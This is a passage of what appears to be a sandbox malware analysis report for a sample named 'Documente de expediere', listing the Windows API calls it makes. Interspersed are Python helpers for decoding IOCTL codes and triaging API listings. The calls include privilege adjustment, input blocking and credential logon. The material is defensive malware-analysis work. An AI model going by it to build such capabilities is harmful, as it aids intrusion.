                                                • Opcode Fuzzy Hash: 4c689a5ae0299fbb66ddfc5992f0eea0a7cf059a8e4e498453d9f71ca0ff220e
                                                • Instruction Fuzzy Hash: D111BFB1515308AFE728EF58DC85DABB7BDEF04710B20C52EF85A83241EB30AC408B24
                                                APIs
                                                • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 006F404B
                                                • DeviceIoControl.KERNEL32(00000000,002D1400,00000007,0000000C,?,0000000C,?,00000000), ref: 006F4088
                                                • CloseHandle.KERNEL32(00000000,?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 006F4091
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                 • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: CloseControlCreateDeviceFileHandle
                                                • String ID:
                                                • API String ID: 33631002-0
                                                • Opcode ID: f94ed36e837a78b94730d23dde83d06bf9ddd3ab9be835f383e8e36f14003a7e
                                                • Instruction ID: 6aaea6423fea910671f730ee20ca754a5f895c57b0cfa215f9c93d30506a7e0c
                                                • Opcode Fuzzy Hash: f94ed36e837a78b94730d23dde83d06bf9ddd3ab9be835f383e8e36f14003a7e
                                                • Instruction Fuzzy Hash: FC113CB1904228BEE7109BECDC45FFFBBBCEB08750F104656FA04E7291DAB8594587A1
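The DeviceIoControl record above passes control code 0x2D1400 with 0x0C-byte input and output buffers. A control code is packed by CTL_CODE() as DeviceType<<16 | Access<<14 | Function<<2 | Method, so 0x2D1400 decomposes to device type 0x2D (FILE_DEVICE_MASS_STORAGE), function 0x500, METHOD_BUFFERED, FILE_ANY_ACCESS, which is the documented IOCTL_STORAGE_QUERY_PROPERTY; the 12-byte input size matches sizeof(STORAGE_PROPERTY_QUERY). The decoder below is an added example for reading IOCTL arguments out of such report lines, not code from the report, the sandbox or the sample; the device-type and known-code tables are the documented winioctl.h values, and the sample line is copied from the record above.

```python
import re

# Fields of a Windows I/O control code, per CTL_CODE() in winioctl.h:
#   DeviceType << 16 | Access << 14 | Function << 2 | Method
DEVICE_TYPES = {
    0x07: "FILE_DEVICE_DISK",
    0x09: "FILE_DEVICE_FILE_SYSTEM",
    0x12: "FILE_DEVICE_NETWORK",
    0x22: "FILE_DEVICE_UNKNOWN",
    0x2D: "FILE_DEVICE_MASS_STORAGE",
}
ACCESS = {0: "FILE_ANY_ACCESS", 1: "FILE_READ_ACCESS",
          2: "FILE_WRITE_ACCESS", 3: "FILE_READ_ACCESS|FILE_WRITE_ACCESS"}
METHODS = {0: "METHOD_BUFFERED", 1: "METHOD_IN_DIRECT",
           2: "METHOD_OUT_DIRECT", 3: "METHOD_NEITHER"}
# A few documented codes, so the decoder can name what it finds
KNOWN = {
    0x00070000: "IOCTL_DISK_GET_DRIVE_GEOMETRY",
    0x002D1080: "IOCTL_STORAGE_GET_DEVICE_NUMBER",
    0x002D1400: "IOCTL_STORAGE_QUERY_PROPERTY",
}


def ctl_code(device_type, function, method, access):
    """Pack a control code exactly as the CTL_CODE() macro does."""
    return (device_type << 16) | (access << 14) | (function << 2) | method


def decode_ioctl(code):
    """Split a control code into its four fields and name them where known."""
    device = (code >> 16) & 0xFFFF
    access = (code >> 14) & 0x3
    function = (code >> 2) & 0xFFF
    method = code & 0x3
    return {
        "code": code,
        "device_type": DEVICE_TYPES.get(device, f"0x{device:X}"),
        "access": ACCESS[access],
        "function": function,
        "method": METHODS[method],
        "name": KNOWN.get(code),
    }


def decode_report_call(line):
    """Parse the plugin's DeviceIoControl(...) notation: hex args, '?' unresolved.
    Argument order is the Win32 one: hDevice, dwIoControlCode, lpInBuffer,
    nInBufferSize, lpOutBuffer, nOutBufferSize, lpBytesReturned, lpOverlapped."""
    m = re.search(r"DeviceIoControl\.\w+\(([^)]*)\)", line)
    if not m:
        raise ValueError("not a DeviceIoControl call line")
    args = [a.strip() for a in m.group(1).split(",")]
    info = decode_ioctl(int(args[1], 16))
    info["in_size"] = None if args[3] == "?" else int(args[3], 16)
    info["out_size"] = None if args[5] == "?" else int(args[5], 16)
    return info


# Call line copied from the record above
SAMPLE_CALL = ("• DeviceIoControl.KERNEL32(00000000,002D1400,00000007,0000000C,"
               "?,0000000C,?,00000000), ref: 006F4088")

if __name__ == "__main__":
    info = decode_report_call(SAMPLE_CALL)
    print(f"0x{info['code']:08X}: {info['name']} ({info['device_type']}, "
          f"function 0x{info['function']:X}, {info['method']}, {info['access']}), "
          f"in={info['in_size']} out={info['out_size']}")
```

The same decomposition works for any IOCTL seen in a sandbox trace; extend KNOWN with the codes relevant to the drivers you care about rather than relying on the device-type field alone, since unrelated IOCTLs share a device type.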
                                                APIs
                                                • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 006F4C2C
                                                • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 006F4C43
                                                • FreeSid.ADVAPI32(?), ref: 006F4C53
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                 • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: AllocateCheckFreeInitializeMembershipToken
                                                • String ID:
                                                • API String ID: 3429775523-0
                                                • Opcode ID: 2292f11ee986aba09917d42defcf006bd40d0e9ca550cc2811ca00aea5f1b766
                                                • Instruction ID: 45e30f0c6408251edb5937f638af8b89b3259cb791a7b060165e684ca1aa0e68
                                                • Opcode Fuzzy Hash: 2292f11ee986aba09917d42defcf006bd40d0e9ca550cc2811ca00aea5f1b766
                                                • Instruction Fuzzy Hash: CAF03C75A1120CBBDB04DFE49C89AEEB7B8EB08211F008469E601E2191D6745A048B54
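The three ADVAPI32 calls listed for the function at 006F4C2C are the standard "is the caller a member of BUILTIN\Administrators" idiom: AllocateAndInitializeSid is passed a sub-authority count of 2 with sub-authorities 0x20 (SECURITY_BUILTIN_DOMAIN_RID) and 0x220 (DOMAIN_ALIAS_RID_ADMINS), and the resulting SID is handed to CheckTokenMembership. The following Python is an added example, not part of the Joe Sandbox report or its plugin: it parses "APIs" entries in the format this listing uses, decodes those SID arguments to recognise the admin-group check, and flags other APIs from this section that a triager would want to see grouped by function. The sample text is constructed from entries copied off this page; the NOTABLE table and its descriptions are the example's own choice.

```python
import re

# Constructed sample: API entries in the shape Joe Sandbox prints them,
# "name.MODULE(args), ref: address", copied from this report's listing.
SAMPLE = """\
APIs
• AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 006F4C2C
• CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 006F4C43
• FreeSid.ADVAPI32(?), ref: 006F4C53
APIs
• AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,006E8851), ref: 006E8728
• CloseHandle.KERNEL32(?,?,006E8851), ref: 006E873A
APIs
• BlockInput.USER32(00000001), ref: 00704218
APIs
• LogonUserW.ADVAPI32(?,00000001,?,?,00000000,006E88D1), ref: 006E8CB3
"""

API_RE = re.compile(
    r"^•\s*(?P<api>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$"
)

# Well-known RIDs from winnt.h
SECURITY_BUILTIN_DOMAIN_RID = 0x20
DOMAIN_ALIAS_RID_ADMINS = 0x220

# Assumed triage table for this example: APIs worth surfacing and why.
NOTABLE = {
    "BlockInput": "blocks keyboard and mouse input",
    "AdjustTokenPrivileges": "changes token privileges",
    "LogonUserW": "logs on with supplied credentials",
}


def parse_api_blocks(text):
    """Split the listing into blocks (one per 'APIs' header) of parsed calls."""
    blocks, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            current = []
            blocks.append(current)
            continue
        m = API_RE.match(line)
        if m and current is not None:
            args = [a.strip() for a in m.group("args").split(",")] if m.group("args") else []
            current.append({"api": m.group("api"), "module": m.group("module"),
                            "args": args, "ref": int(m.group("ref"), 16)})
    return blocks


def arg_int(args, i):
    """Decode argument i as a hex integer; '?' means the sandbox could not resolve it."""
    if i >= len(args) or args[i] == "?":
        return None
    return int(args[i], 16)


def is_admin_group_check(block):
    """True when the block builds the BUILTIN\\Administrators SID and tests membership."""
    names = {c["api"] for c in block}
    if not {"AllocateAndInitializeSid", "CheckTokenMembership"} <= names:
        return False
    sid = next(c for c in block if c["api"] == "AllocateAndInitializeSid")
    # AllocateAndInitializeSid(pAuthority, nSubAuthorityCount, sub0, sub1, ...)
    return (arg_int(sid["args"], 1) == 2
            and arg_int(sid["args"], 2) == SECURITY_BUILTIN_DOMAIN_RID
            and arg_int(sid["args"], 3) == DOMAIN_ALIAS_RID_ADMINS)


def triage(text):
    """Return (label, ref_address) findings for every block in the listing."""
    findings = []
    for block in parse_api_blocks(text):
        if is_admin_group_check(block):
            findings.append(("admin-group-check", block[0]["ref"]))
        for call in block:
            if call["api"] in NOTABLE:
                findings.append((call["api"], call["ref"]))
    return findings


if __name__ == "__main__":
    for label, ref in triage(SAMPLE):
        print(f"{ref:08X}  {label}")
```

The ref address is kept as an integer so findings can be joined against the Opcode ID / Instruction ID entries of the same function block, or against xrefs in the IDA snapshot, rather than compared as strings.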
                                                APIs
                                                • __time64.LIBCMT ref: 006F8B25
                                                  • Part of subcall function 006B543A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,006F91F8,00000000,?,?,?,?,006F93A9,00000000,?), ref: 006B5443
                                                  • Part of subcall function 006B543A: __aulldiv.LIBCMT ref: 006B5463
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                 • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: Time$FileSystem__aulldiv__time64
                                                • String ID: 0uu
                                                • API String ID: 2893107130-2836214914
                                                • Opcode ID: 4895cecf4bd7252d2d1cbd3dbbba192cb39449720e96550da2f4b74ac749dba2
                                                • Instruction ID: 0c34bc01d94a746e917e9b309f8cbed11b45bdb7b555c09b7d3c6c89b148bdc5
                                                • Opcode Fuzzy Hash: 4895cecf4bd7252d2d1cbd3dbbba192cb39449720e96550da2f4b74ac749dba2
                                                • Instruction Fuzzy Hash: 2621E472635614CFC729CF25D841AA2B3E2EBA4311B288E6CD1E5CB2D0CA74BD45CB94
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                 • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: cf69725a73cb4d16d8c49727fbb85fe1bb24e7d1c4ea24ad94925027e0802017
                                                • Instruction ID: b007a017badbe3f417ca035b85d45acf02736aaeb68bc1f01ebaa8f9cb77f254
                                                • Opcode Fuzzy Hash: cf69725a73cb4d16d8c49727fbb85fe1bb24e7d1c4ea24ad94925027e0802017
                                                • Instruction Fuzzy Hash: 56229C74A00215DFDF24DF58C480ABEBBFAFF04300F14856AE856AB751E736A985CB91
                                                APIs
                                                • FindFirstFileW.KERNEL32(?,?), ref: 006FC966
                                                • FindClose.KERNEL32(00000000), ref: 006FC996
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                 • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: Find$CloseFileFirst
                                                • String ID:
                                                • API String ID: 2295610775-0
                                                • Opcode ID: 02765e3c37cb4e9d3f57d4ec265a71051284aa3ee902048aa13ff82247e43efa
                                                • Instruction ID: 154a53ac6e637ede61df61571d0e174225d1717e354fdb554f116bd3c999421e
                                                • Opcode Fuzzy Hash: 02765e3c37cb4e9d3f57d4ec265a71051284aa3ee902048aa13ff82247e43efa
                                                • Instruction Fuzzy Hash: 69118E326006049FDB10EF29C845A6AF7EAFF84320F00C51EF9A9D7291DB74AC01CB95
                                                APIs
                                                • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,0070977D,?,0071FB84,?), ref: 006FA302
                                                • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,0070977D,?,0071FB84,?), ref: 006FA314
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                 • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: ErrorFormatLastMessage
                                                • String ID:
                                                • API String ID: 3479602957-0
                                                • Opcode ID: 00c1c45a00112845c702682e19634e490b27b7cd02358515ef0bd8f8e258e3d9
                                                • Instruction ID: 17e7b5e8e1be91b7b98d8e94348f849f7d88ed9b95baad8b5cfdd53c595fb9a9
                                                • Opcode Fuzzy Hash: 00c1c45a00112845c702682e19634e490b27b7cd02358515ef0bd8f8e258e3d9
                                                • Instruction Fuzzy Hash: BFF0823554422DABDB10AFA4CC49FFA776EFF09761F00C169F919D7181D6309940CBA5
                                                APIs
                                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,006E8851), ref: 006E8728
                                                • CloseHandle.KERNEL32(?,?,006E8851), ref: 006E873A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                 • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: AdjustCloseHandlePrivilegesToken
                                                • String ID:
                                                • API String ID: 81990902-0
                                                • Opcode ID: e8087d5c248f9bac347a9cf8723ad7574c6a5c6411d28117d1830c2d96a48fa5
                                                • Instruction ID: b4fa269763f19cc8a095acf1eba0c0a743314dbd2df35c08b3528f5a5a64f45d
                                                • Opcode Fuzzy Hash: e8087d5c248f9bac347a9cf8723ad7574c6a5c6411d28117d1830c2d96a48fa5
                                                • Instruction Fuzzy Hash: 9DE0B676010650EEEB652B65ED09DB77BAAEB04350724C92DF49A84470DB62ACD0DB14
                                                APIs
                                                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,006B8F97,?,?,?,00000001), ref: 006BA39A
                                                • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 006BA3A3
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                 • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: ExceptionFilterUnhandled
                                                • String ID:
                                                • API String ID: 3192549508-0
                                                • Opcode ID: 0d4102ae7e0c4e66400206550c11ad2850cd6f30ab7042fdfda8bd6487b359e6
                                                • Instruction ID: 4c89e8386ef48c08879af788833d57eb997205edbe68495228d50cdb18ea6403
                                                • Opcode Fuzzy Hash: 0d4102ae7e0c4e66400206550c11ad2850cd6f30ab7042fdfda8bd6487b359e6
                                                • Instruction Fuzzy Hash: 1BB09231054208EBCA002B99EC09BC83F68FB44BA2F40C020F61D840A0CB6654508A99
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                 • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5969569ff40a09d5d127e25e4e74944bbdd44b077d757d6f0c5031db352075b0
                                                • Instruction ID: 2749e26546b9c9519dfb906bc32afff67ed73ac4102c40411bb23b4930970667
                                                • Opcode Fuzzy Hash: 5969569ff40a09d5d127e25e4e74944bbdd44b077d757d6f0c5031db352075b0
                                                • Instruction Fuzzy Hash: A63237A2D29F414DD7275638DD32376A689AFB73C4F14D737E819B5AA6DB28C4C34200
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                 • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f325296d28f4ee0653ce4c757f7304058be59d26c47fb0cf5b165bf76a0dfbbd
                                                • Instruction ID: 42ffcbf7e92c9742e469e49aecdc4890a660ae68e1670c130f4a2b28c63d0bd1
                                                • Opcode Fuzzy Hash: f325296d28f4ee0653ce4c757f7304058be59d26c47fb0cf5b165bf76a0dfbbd
                                                • Instruction Fuzzy Hash: 2FB10020D2AF414ED723A6398831336BB5CAFBB6D5F51D71BFC2670D22EB2585834145
                                                APIs
                                                • BlockInput.USER32(00000001), ref: 00704218
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                 • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: BlockInput
                                                • String ID:
                                                • API String ID: 3456056419-0
                                                • Opcode ID: d4f0f653be03cd218742a8304dffd61bdd59bfc1abba61453ccc43fda0fbc235
                                                • Instruction ID: fc053adaa1dd4c6ce32801615dc7f9ff142d77158b909136cc5b761a428d6211
                                                • Opcode Fuzzy Hash: d4f0f653be03cd218742a8304dffd61bdd59bfc1abba61453ccc43fda0fbc235
                                                • Instruction Fuzzy Hash: 53E01A712402149FCB10AF5AD844A9AB7EDAFA4760F00802AF949C77A2DA74E8418BA4
                                                APIs
                                                • mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 006F4F18
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                 • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: mouse_event
                                                • String ID:
                                                • API String ID: 2434400541-0
                                                • Opcode ID: 57268c214e17b1f68691566021ceb32437684ef5dc8d3ec572256ff0418acc7f
                                                • Instruction ID: f17b75871d79feb14ca204bc0528440dc3e02724e5a2a7c6f1c7efacc46cea75
                                                • Opcode Fuzzy Hash: 57268c214e17b1f68691566021ceb32437684ef5dc8d3ec572256ff0418acc7f
                                                • Instruction Fuzzy Hash: F4D09EF516560D79FD184B24AC1FFB7110BF3C0791F94A989730A95EC1DCE56851A039
                                                APIs
                                                • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,006E88D1), ref: 006E8CB3
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                 • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: LogonUser
                                                • String ID:
                                                • API String ID: 1244722697-0
                                                • Opcode ID: 9059458491c237d9ca12df0cc668a381c984fd4fcf4dfafa6eb6412243109fcc
                                                • Instruction ID: cc71d78a571d8e6110c9bf680d00c43c933df90cb4d464d4768eb32df7ad6651
                                                • Opcode Fuzzy Hash: 9059458491c237d9ca12df0cc668a381c984fd4fcf4dfafa6eb6412243109fcc
                                                • Instruction Fuzzy Hash: 68D09E3226450EABEF019EA8DD05EEE3B69EB04B01F40C511FE15D51A1C775D935AB60
                                                APIs
                                                • GetUserNameW.ADVAPI32(?,?), ref: 006D2242
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                 • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: NameUser
                                                • String ID:
                                                • API String ID: 2645101109-0
                                                • Opcode ID: f4585b15eb33ac35868f28c82ad222371338fbc54bd97d21784b69a0315cc2b2
                                                • Instruction ID: e16b013f2e4ae7a3837007018aad2f5c48ffdb4782a4ef53f8601ec60f8d153c
                                                • Opcode Fuzzy Hash: f4585b15eb33ac35868f28c82ad222371338fbc54bd97d21784b69a0315cc2b2
                                                • Instruction Fuzzy Hash: DAC04CF1C00109DBDB05DB90D988DFE77BCAB08304F108156E141F2140D7B49B448A71
                                                APIs
                                                • SetUnhandledExceptionFilter.KERNEL32(?), ref: 006BA36A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                 • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: ExceptionFilterUnhandled
                                                • String ID:
                                                • API String ID: 3192549508-0
                                                • Opcode ID: 6830744d266f9515a043f14290ff4e7ee6e576fe1e4ca19b1ed2e5249884f2e3
                                                • Instruction ID: 63a041da0162bfc313d8ef5c2c202dfcb5437c006ab3692812d989ebbc0eec62
                                                • Opcode Fuzzy Hash: 6830744d266f9515a043f14290ff4e7ee6e576fe1e4ca19b1ed2e5249884f2e3
                                                • Instruction Fuzzy Hash: 31A0113000020CAB8A002B8AEC08888BFACEA002A0B00C020F80C80022CB32A8208A88
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
